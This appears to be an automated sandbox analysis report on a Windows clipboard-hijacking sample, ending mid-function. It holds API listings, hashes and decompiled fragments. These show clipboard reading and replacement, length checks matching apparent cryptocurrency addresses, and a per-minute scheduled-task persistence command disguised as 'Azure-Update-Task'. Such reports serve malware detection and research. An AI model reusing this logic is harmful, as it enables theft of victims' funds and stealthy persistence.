				void* _t9;

				_t9 = 0;
				if(OpenClipboard(0) != 0) {
					_t3 = GetClipboardData(0xd);
					_t7 = _t3;
					if(_t7 != 0) {
						GlobalFix(_t7);
						_t9 = _t3;
						if(_t9 != 0) {
							GlobalUnWire(_t7);
						}
					}
					CloseClipboard();
				}
				return _t9;
			}






                                                                                                                                                                                          0x00401b3c
                                                                                                                                                                                          0x00401b47
                                                                                                                                                                                          0x00401b4c
                                                                                                                                                                                          0x00401b52
                                                                                                                                                                                          0x00401b56
                                                                                                                                                                                          0x00401b59
                                                                                                                                                                                          0x00401b5f
                                                                                                                                                                                          0x00401b63
                                                                                                                                                                                          0x00401b66
                                                                                                                                                                                          0x00401b66
                                                                                                                                                                                          0x00401b63
                                                                                                                                                                                          0x00401b6c
                                                                                                                                                                                          0x00401b72
                                                                                                                                                                                          0x00401b76

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • OpenClipboard.USER32(00000000), ref: 00401B3F
                                                                                                                                                                                          • GetClipboardData.USER32(0000000D), ref: 00401B4C
                                                                                                                                                                                          • GlobalFix.KERNEL32(00000000), ref: 00401B59
                                                                                                                                                                                          • GlobalUnWire.KERNEL32(00000000), ref: 00401B66
                                                                                                                                                                                          • CloseClipboard.USER32 ref: 00401B6C
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.435951957.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Clipboard$Global$CloseDataOpenWire
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1198520892-0
                                                                                                                                                                                          • Opcode ID: 3c49645208ac729d989d0f948fee9bd6a50bf7ba83a65ea476ea956c222f9c8c
                                                                                                                                                                                          • Instruction ID: 55b30d85abf3daad0443f3bd262dede7e9ebf4be7780eec4932cf4255b49ec97
                                                                                                                                                                                          • Opcode Fuzzy Hash: 3c49645208ac729d989d0f948fee9bd6a50bf7ba83a65ea476ea956c222f9c8c
                                                                                                                                                                                          • Instruction Fuzzy Hash: 47E0BF7690152197D2212B75BD0CE5BBE78AFC5B517060136FB05F2265DB38880195AD
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 02C60D90, Relevance: .0, Instructions: 38COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.436398329.0000000002C60000.00000040.00000001.sdmp, Offset: 02C60000, based on PE: false
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: da1566a2f6af9372ef5ff0064129cc8c7bd33331f23317b37220a35c5510ad97
                                                                                                                                                                                          • Instruction ID: 15b755092a14ef3df0439e88747d0616cace29152525239823e1c00132d6235b
                                                                                                                                                                                          • Opcode Fuzzy Hash: da1566a2f6af9372ef5ff0064129cc8c7bd33331f23317b37220a35c5510ad97
                                                                                                                                                                                          • Instruction Fuzzy Hash: D0F0C276A005049FDB21CF24C889BBE73F9FBC4215F0446A4D80AE7241D330E942CB50
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 02C61250, Relevance: 52.7, APIs: 35, Instructions: 159libraryloaderCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • LoadLibraryW.KERNEL32(004036C8), ref: 02C6125B
                                                                                                                                                                                          • LoadLibraryW.KERNEL32(0040370C), ref: 02C61291
                                                                                                                                                                                          • LoadLibraryW.KERNEL32(00403720), ref: 02C6129F
                                                                                                                                                                                          • LoadLibraryW.KERNEL32(00403738), ref: 02C612AC
                                                                                                                                                                                          • LoadLibraryW.KERNEL32(0040374C), ref: 02C612B9
                                                                                                                                                                                          • LoadLibraryW.KERNEL32(00403738), ref: 02C612C7
                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,00403788), ref: 02C612F2
                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,0040379C), ref: 02C61303
                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,004037A8), ref: 02C61314
                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,004037B4), ref: 02C61325
                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,004037C0), ref: 02C61336
                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,004037D0), ref: 02C61347
                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,004037DC), ref: 02C61358
                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,004037E8), ref: 02C61369
                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,004037F4), ref: 02C6137D
                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,004037FC), ref: 02C6138E
                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,00403804), ref: 02C6139F
                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,00403810), ref: 02C613AB
                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,0040381C), ref: 02C613B7
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,00403830), ref: 02C613C8
                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,00403840), ref: 02C613D7
                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,0040384C), ref: 02C613E3
                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,0040385C), ref: 02C613EF
                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,0040386C), ref: 02C61400
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,0040387C), ref: 02C61411
                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,00403890), ref: 02C6141D
                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,0040389C), ref: 02C61431
                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,004038AC), ref: 02C61440
                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,004038B4), ref: 02C61451
                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,004038BC), ref: 02C6145D
                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,004038C4), ref: 02C6146E
                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,004038D4), ref: 02C6147F
                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,004038E8), ref: 02C61490
                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,004038F8), ref: 02C614A1
                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,0040390C), ref: 02C614B2
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.436398329.0000000002C60000.00000040.00000001.sdmp, Offset: 02C60000, based on PE: false
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AddressProc$LibraryLoad
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2238633743-0
                                                                                                                                                                                          • Opcode ID: e6b314939ad2e5d0882570927fe1788e67a826271dba78cacea67a5e4306d291
                                                                                                                                                                                          • Instruction ID: 810410d84f07510b68d2279596a66a4244035fbafc9fc8d3546152a8dc498d68
                                                                                                                                                                                          • Opcode Fuzzy Hash: e6b314939ad2e5d0882570927fe1788e67a826271dba78cacea67a5e4306d291
                                                                                                                                                                                          • Instruction Fuzzy Hash: 9451A9F2951310BBC7007FB5AE4DA8A7EFCAA8974771184B7B305F31A1D6B892448B5C
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00410B73, Relevance: 26.6, APIs: 13, Strings: 2, Instructions: 368COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.435969792.0000000000406000.00000020.00020000.sdmp, Offset: 00406000, based on PE: false
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: _get_int64_arg_write_multi_char$__aulldiv__aullrem_wctomb_s_write_string
                                                                                                                                                                                          • String ID: -$9
                                                                                                                                                                                          • API String ID: 3451365851-1631151375
                                                                                                                                                                                          • Opcode ID: 1a9a09d93578db34f9c0d612a98667e564935c5bb814d1e3d5b61f6c27d3800b
                                                                                                                                                                                          • Instruction ID: 653ea854a318213682fef8ef0d7c2510b134a99a2165e43a47bb046c5770e462
                                                                                                                                                                                          • Opcode Fuzzy Hash: 1a9a09d93578db34f9c0d612a98667e564935c5bb814d1e3d5b61f6c27d3800b
                                                                                                                                                                                          • Instruction Fuzzy Hash: 57F138B1D052298FDB24CF58CC89BEEB7B1BB48304F10819AE409A7291D7789EC0CF59
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00407235, Relevance: 24.9, APIs: 13, Strings: 1, Instructions: 365COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.435969792.0000000000406000.00000020.00020000.sdmp, Offset: 00406000, based on PE: false
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: _get_int64_arg_write_multi_char$__aulldiv__aullrem__mbtowc_l_write_string
                                                                                                                                                                                          • String ID: 9
                                                                                                                                                                                          • API String ID: 3455034128-2366072709
                                                                                                                                                                                          • Opcode ID: 4fcff20f53753deb092c499b28c604d23a3b997073a29a194913335518047743
                                                                                                                                                                                          • Instruction ID: 44260cf9f1c9588520b15a15453b67d017e9ba5cfde90ac40a21584d8801aa82
                                                                                                                                                                                          • Opcode Fuzzy Hash: 4fcff20f53753deb092c499b28c604d23a3b997073a29a194913335518047743
                                                                                                                                                                                          • Instruction Fuzzy Hash: B6F15FF1D042199FDB24CF54CC85BAEB7B5BB45304F1484AAE609B7281D738AE84CF5A
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 02C61589, Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 82processmemorysynchronizationCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • memset.NTDLL ref: 02C6159F
                                                                                                                                                                                          • memset.NTDLL ref: 02C615AF
                                                                                                                                                                                          • LocalAlloc.KERNEL32(00000040,00000308), ref: 02C615BF
                                                                                                                                                                                            • Part of subcall function 02C61FCC: lstrlenW.KERNEL32(?,00000044,?,00000000,?,?,?,02C615D5), ref: 02C61FE2
                                                                                                                                                                                            • Part of subcall function 02C61FCC: lstrlenW.KERNEL32(/C /create /F /sc minute /mo 1 /tn ",00000044,?,00000000,?,?,?,02C615D5), ref: 02C61FEF
                                                                                                                                                                                            • Part of subcall function 02C61FCC: LocalAlloc.KERNEL32(00000040,00000001,?,02C615D5), ref: 02C62000
                                                                                                                                                                                            • Part of subcall function 02C61FCC: GlobalFree.KERNEL32(?), ref: 02C62021
                                                                                                                                                                                          • CreateProcessW.KERNEL32(004039E8,?,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 02C61621
                                                                                                                                                                                          • LocalFree.KERNEL32(?), ref: 02C61630
                                                                                                                                                                                          • WaitForSingleObject.KERNEL32(?,000000FF), ref: 02C6163F
                                                                                                                                                                                          • LocalFree.KERNEL32(?), ref: 02C6165A
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.436398329.0000000002C60000.00000040.00000001.sdmp, Offset: 02C60000, based on PE: false
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Local$Free$Alloclstrlenmemset$CreateGlobalObjectProcessSingleWait
                                                                                                                                                                                          • String ID: " /tr "$/C /create /F /sc minute /mo 1 /tn "$Azure-Update-Task$9@
                                                                                                                                                                                          • API String ID: 3199137260-561363415
                                                                                                                                                                                          • Opcode ID: 1ec7269c68737af2b38322868ed3762ec80b395895a701cf05524ec3fdf00e48
                                                                                                                                                                                          • Instruction ID: 02738a5c6a7977df94ccd5fe5479601067bb0b0f3358b419eaace194af235466
                                                                                                                                                                                          • Opcode Fuzzy Hash: 1ec7269c68737af2b38322868ed3762ec80b395895a701cf05524ec3fdf00e48
                                                                                                                                                                                          • Instruction Fuzzy Hash: 7221A4B5900109BFD710EFA4DD89EAF7F7DEB80756F240035B605B6294DBB09F009A69
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 02C61DC7, Relevance: 18.1, APIs: 12, Instructions: 119stringmemorysleepCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 02C61250: LoadLibraryW.KERNEL32(004036C8), ref: 02C6125B
                                                                                                                                                                                            • Part of subcall function 02C61250: LoadLibraryW.KERNEL32(0040370C), ref: 02C61291
                                                                                                                                                                                            • Part of subcall function 02C61250: LoadLibraryW.KERNEL32(00403720), ref: 02C6129F
                                                                                                                                                                                            • Part of subcall function 02C61250: LoadLibraryW.KERNEL32(00403738), ref: 02C612AC
                                                                                                                                                                                            • Part of subcall function 02C61250: LoadLibraryW.KERNEL32(0040374C), ref: 02C612B9
                                                                                                                                                                                            • Part of subcall function 02C61250: LoadLibraryW.KERNEL32(00403738), ref: 02C612C7
                                                                                                                                                                                            • Part of subcall function 02C61250: GetProcAddress.KERNEL32(?,00403788), ref: 02C612F2
                                                                                                                                                                                            • Part of subcall function 02C61250: GetProcAddress.KERNEL32(?,0040379C), ref: 02C61303
                                                                                                                                                                                            • Part of subcall function 02C61250: GetProcAddress.KERNEL32(?,004037A8), ref: 02C61314
                                                                                                                                                                                            • Part of subcall function 02C61250: GetProcAddress.KERNEL32(?,004037B4), ref: 02C61325
                                                                                                                                                                                            • Part of subcall function 02C61250: GetProcAddress.KERNEL32(?,004037C0), ref: 02C61336
                                                                                                                                                                                            • Part of subcall function 02C61250: GetProcAddress.KERNEL32(?,004037D0), ref: 02C61347
                                                                                                                                                                                            • Part of subcall function 02C61250: GetProcAddress.KERNEL32(?,004037DC), ref: 02C61358
                                                                                                                                                                                            • Part of subcall function 02C61250: GetProcAddress.KERNEL32(?,004037E8), ref: 02C61369
                                                                                                                                                                                            • Part of subcall function 02C61250: GetProcAddress.KERNEL32(?,004037F4), ref: 02C6137D
                                                                                                                                                                                            • Part of subcall function 02C61250: GetProcAddress.KERNEL32(?,004037FC), ref: 02C6138E
                                                                                                                                                                                            • Part of subcall function 02C61250: GetProcAddress.KERNEL32(?,00403804), ref: 02C6139F
                                                                                                                                                                                            • Part of subcall function 02C61250: GetProcAddress.KERNEL32(?,00403810), ref: 02C613AB
                                                                                                                                                                                            • Part of subcall function 02C61250: GetProcAddress.KERNEL32(?,0040381C), ref: 02C613B7
                                                                                                                                                                                            • Part of subcall function 02C61250: GetProcAddress.KERNEL32(00000000,00403830), ref: 02C613C8
                                                                                                                                                                                            • Part of subcall function 02C61250: GetProcAddress.KERNEL32(?,00403840), ref: 02C613D7
                                                                                                                                                                                          • CreateMutexW.KERNEL32(00000000,00000000,00403030), ref: 02C61DDE
                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 02C61DE4
                                                                                                                                                                                          • ExitProcess.KERNEL32 ref: 02C61DF3
                                                                                                                                                                                          • lstrlenW.KERNEL32(00000000), ref: 02C61E14
                                                                                                                                                                                          • LocalAlloc.KERNEL32(00000040,00000000), ref: 02C61E26
                                                                                                                                                                                          • LocalAlloc.KERNEL32(00000040,?,?), ref: 02C61E8A
                                                                                                                                                                                          • lstrlenW.KERNEL32(?,?), ref: 02C61EE9
                                                                                                                                                                                          • LocalFree.KERNEL32(?), ref: 02C61F04
                                                                                                                                                                                          • lstrlenW.KERNEL32(?,?), ref: 02C61F0D
                                                                                                                                                                                          • LocalFree.KERNEL32(?), ref: 02C61F20
                                                                                                                                                                                          • Sleep.KERNEL32(000000E1), ref: 02C61F2B
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.436398329.0000000002C60000.00000040.00000001.sdmp, Offset: 02C60000, based on PE: false
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AddressProc$LibraryLoad$Local$lstrlen$AllocFree$CreateErrorExitLastMutexProcessSleep
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3526352376-0
                                                                                                                                                                                          • Opcode ID: 347b62e39c1b5feb9e8dd141994958ff6feaa20621b2d653af5b8c2ba136f58b
                                                                                                                                                                                          • Instruction ID: b16e5c85db634e8ba305d63882d9492b6c12e3d3e653d406712b48766dbd8b58
                                                                                                                                                                                          • Opcode Fuzzy Hash: 347b62e39c1b5feb9e8dd141994958ff6feaa20621b2d653af5b8c2ba136f58b
                                                                                                                                                                                          • Instruction Fuzzy Hash: 9C416F75900215ABCB219FE4C98C67EBAF5BF88307F180025E645F3360DBB4DA019B55
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00406001, Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 263COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.435969792.0000000000406000.00000020.00020000.sdmp, Offset: 00406000, based on PE: false
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: _write_multi_char$_write_string$__aulldiv__aullrem__mbtowc_l
                                                                                                                                                                                          • String ID: 9
                                                                                                                                                                                          • API String ID: 306235055-2366072709
                                                                                                                                                                                          • Opcode ID: 20bd4080c8e660b2b765e9eaec09d05692696ac55142104f97c21983c69165a8
                                                                                                                                                                                          • Instruction ID: 4d1ee3b5c3b669ca86b3b2560db9b9e2486537ce75942733b24cdf4f3669aa82
                                                                                                                                                                                          • Opcode Fuzzy Hash: 20bd4080c8e660b2b765e9eaec09d05692696ac55142104f97c21983c69165a8
                                                                                                                                                                                          • Instruction Fuzzy Hash: 6FC11AB1D002299FDB14CF98C881BAEB7B5FF84304F1541A9E60AB7281D7385E91CF59
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 004108D7, Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 241COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.435969792.0000000000406000.00000020.00020000.sdmp, Offset: 00406000, based on PE: false
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: _write_multi_char$__get_printf_count_output_get_int_arg_wctomb_s_write_string
                                                                                                                                                                                          • String ID: -
                                                                                                                                                                                          • API String ID: 532768033-2547889144
                                                                                                                                                                                          • Opcode ID: 85c6db6edcee3a764261b9dadb276df4ee325cc57f35f31d4818c573b552330a
                                                                                                                                                                                          • Instruction ID: 445fecfb2395e1bc81349e7a00bdb9547341c29de4ea7dfb4c7d74514e35de85
                                                                                                                                                                                          • Opcode Fuzzy Hash: 85c6db6edcee3a764261b9dadb276df4ee325cc57f35f31d4818c573b552330a
                                                                                                                                                                                          • Instruction Fuzzy Hash: B7A180B0D052298BEF20DF54CC49BEEB7B1AB48304F1441DAE518BA291D7B99EC0CF59
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00410725, Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 225COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.435969792.0000000000406000.00000020.00020000.sdmp, Offset: 00406000, based on PE: false
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: _write_multi_char$_get_int_arg_strlen_wctomb_s_write_string
                                                                                                                                                                                          • String ID: -
                                                                                                                                                                                          • API String ID: 2232461714-2547889144
                                                                                                                                                                                          • Opcode ID: d0d823aee03a34b056043af3defca92891557a7d9fe23642221d1551105c16b1
                                                                                                                                                                                          • Instruction ID: 101e3251ec34b98fd8c90ff1df4b4bcaf2cc239290caa32785a8a7b5b6a31c4b
                                                                                                                                                                                          • Opcode Fuzzy Hash: d0d823aee03a34b056043af3defca92891557a7d9fe23642221d1551105c16b1
                                                                                                                                                                                          • Instruction Fuzzy Hash: EFA17A70D012288BDB64CF54CC89BEEB7B1BB48304F1481DAE519AB291D7B99EC0CF59
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 02C61D27, Relevance: 13.5, APIs: 9, Instructions: 36clipboardmemoryCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GlobalAlloc.KERNEL32(00000002,00000000,?,00000000,00000000,02C61F1D), ref: 02C61D36
                                                                                                                                                                                          • GlobalFix.KERNEL32(00000000), ref: 02C61D41
                                                                                                                                                                                          • memcpy.NTDLL(00000000), ref: 02C61D48
                                                                                                                                                                                          • GlobalUnWire.KERNEL32(00000000), ref: 02C61D52
                                                                                                                                                                                          • OpenClipboard.USER32(00000000), ref: 02C61D5A
                                                                                                                                                                                          • EmptyClipboard.USER32 ref: 02C61D64
                                                                                                                                                                                          • SetClipboardData.USER32(0000000D,00000000), ref: 02C61D6D
                                                                                                                                                                                          • CloseClipboard.USER32 ref: 02C61D73
                                                                                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 02C61D7A
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.436398329.0000000002C60000.00000040.00000001.sdmp, Offset: 02C60000, based on PE: false
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ClipboardGlobal$AllocCloseDataEmptyFreeOpenWirememcpy
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2518647738-0
                                                                                                                                                                                          • Opcode ID: 6e8f05b13c52bda2192f9b5ea7998a520b2c1201303ff2b2893ffa802e95b434
                                                                                                                                                                                          • Instruction ID: 5db496f50071b2cf3005acbee94e554ebba1e03153c434a0a1f51f80c665fd9a
                                                                                                                                                                                          • Opcode Fuzzy Hash: 6e8f05b13c52bda2192f9b5ea7998a520b2c1201303ff2b2893ffa802e95b434
                                                                                                                                                                                          • Instruction Fuzzy Hash: 7CF0DAF6601110ABE2002BB5BE8DB6B3E6CEBC9757F050535B306F51A1CA7484048778
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00419B60, Relevance: 12.0, APIs: 8, Instructions: 38librarytimethreadCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • LoadLibraryA.KERNEL32(00421EEC), ref: 00419B70
                                                                                                                                                                                          • GetCurrentDirectoryW.KERNEL32(00000000,?), ref: 00419B7F
                                                                                                                                                                                          • SetSystemTime.KERNEL32(00000000), ref: 00419B87
                                                                                                                                                                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000000), ref: 00419B98
                                                                                                                                                                                          • FreeLibraryAndExitThread.KERNEL32(00000000,00000000), ref: 00419BA2
                                                                                                                                                                                          • FindFirstChangeNotificationA.KERNEL32(00421EFC,00000000,00000000), ref: 00419BB1
                                                                                                                                                                                          • LCMapStringA.KERNEL32(00000000,00000000,00421F1C,00000000,?,00000000), ref: 00419BCB
                                                                                                                                                                                          • TlsGetValue.KERNEL32(00000000), ref: 00419BD3
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.435969792.0000000000406000.00000020.00020000.sdmp, Offset: 00406000, based on PE: false
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Library$ChangeCurrentDirectoryExitFileFindFirstFreeLoadModuleNameNotificationStringSystemThreadTimeValue
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1784048794-0
                                                                                                                                                                                          • Opcode ID: 0af3889749f43eeecc148a883a65a84b529d05b0c956aced57ee8f991bc1cdc1
                                                                                                                                                                                          • Instruction ID: e589456b1699ab58c567d739c912f2cf862097d719ddb17d9b21405fbe78bbf5
                                                                                                                                                                                          • Opcode Fuzzy Hash: 0af3889749f43eeecc148a883a65a84b529d05b0c956aced57ee8f991bc1cdc1
                                                                                                                                                                                          • Instruction Fuzzy Hash: 3601EC35394308AFE7509BE0AC0AFDA7B24EB0DB02F508055FB1DD90E0DBE41584CBAA
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00406F9A, Relevance: 10.7, APIs: 7, Instructions: 238COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.435969792.0000000000406000.00000020.00020000.sdmp, Offset: 00406000, based on PE: false
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: _write_multi_char$__get_printf_count_output__mbtowc_l_get_int_arg_write_string
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 4168457693-0
                                                                                                                                                                                          • Opcode ID: 44fcc49f60f58285e5f9283564e37d0e290b17b888b1392288584d7e114d89ad
                                                                                                                                                                                          • Instruction ID: 5783ae4fa3ace3306abf742abbb44e072aec33fa5154f1a097697c60da70c7f4
                                                                                                                                                                                          • Opcode Fuzzy Hash: 44fcc49f60f58285e5f9283564e37d0e290b17b888b1392288584d7e114d89ad
                                                                                                                                                                                          • Instruction Fuzzy Hash: A5A1A3F1D442199BDB24DF54CC85BAEB774AB44304F1080AAE609772C1D779AE84CF5E
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00406DC4, Relevance: 10.7, APIs: 7, Instructions: 222COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.435969792.0000000000406000.00000020.00020000.sdmp, Offset: 00406000, based on PE: false
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: _write_multi_char$__mbtowc_l_get_int_arg_strlen_write_string
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 909868375-0
                                                                                                                                                                                          • Opcode ID: 3be1e5502759e1e7b5207488dc20e90ab2552a12d282a777878a723582cdcecf
                                                                                                                                                                                          • Instruction ID: 76c5c194636e8b2f4865bd4f5cda7f9b0b6a08818c9518e3daf862c3a67a0ccb
                                                                                                                                                                                          • Opcode Fuzzy Hash: 3be1e5502759e1e7b5207488dc20e90ab2552a12d282a777878a723582cdcecf
                                                                                                                                                                                          • Instruction Fuzzy Hash: B7A170B1D042189FDB24CF54CC85BAEB7B5BB44305F1481AAE60A772C1E739AE84CF59
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00410BA1, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 104COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.435969792.0000000000406000.00000020.00020000.sdmp, Offset: 00406000, based on PE: false
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: __aulldiv__aullrem_get_int64_arg
                                                                                                                                                                                          • String ID: '$0$9
                                                                                                                                                                                          • API String ID: 3120068967-269856862
                                                                                                                                                                                          • Opcode ID: 116f8ebee97dc1323232d8d5e5f82bcaf57024a6c58e21d710bddbb84aa3cbba
                                                                                                                                                                                          • Instruction ID: 07d55785e54881d32caa72cedfa6fe5eea0ab8049c29c9414e6dfe1d52044e4f
                                                                                                                                                                                          • Opcode Fuzzy Hash: 116f8ebee97dc1323232d8d5e5f82bcaf57024a6c58e21d710bddbb84aa3cbba
                                                                                                                                                                                          • Instruction Fuzzy Hash: 9241D4B1D05228DFEB24CF98D889BEEB7B5BB44304F24859AD409A7241D778AEC1CF45
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00401EF7, Relevance: 9.1, APIs: 6, Instructions: 68stringCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                          			E00401EF7(WCHAR* __ecx) {
				signed int _t4;
				WCHAR* _t8;
				void* _t12;
				short _t13;
				WCHAR* _t14;
				WCHAR* _t15;

				_t14 = __ecx;
				if(lstrlenW(__ecx) == 0x5f || lstrlenW(_t14) == 0x6a) {
					_t12 = 0x34;
					if( *_t14 != _t12) {
						goto L20;
					} else {
						_t4 = _t14[1] & 0x0000ffff;
						_t13 = 0x30;
						if(_t4 == 0x41 || _t4 == 0x42 || _t4 == _t13 || _t4 == 0x31 || _t4 == 0x32 || _t4 == 0x33 || _t4 == _t12 || _t4 == 0x35 || _t4 == 0x36 || _t4 == 0x37 || _t4 == 0x38 || _t4 == 0x39) {
							_t15 =  &(_t14[2]);
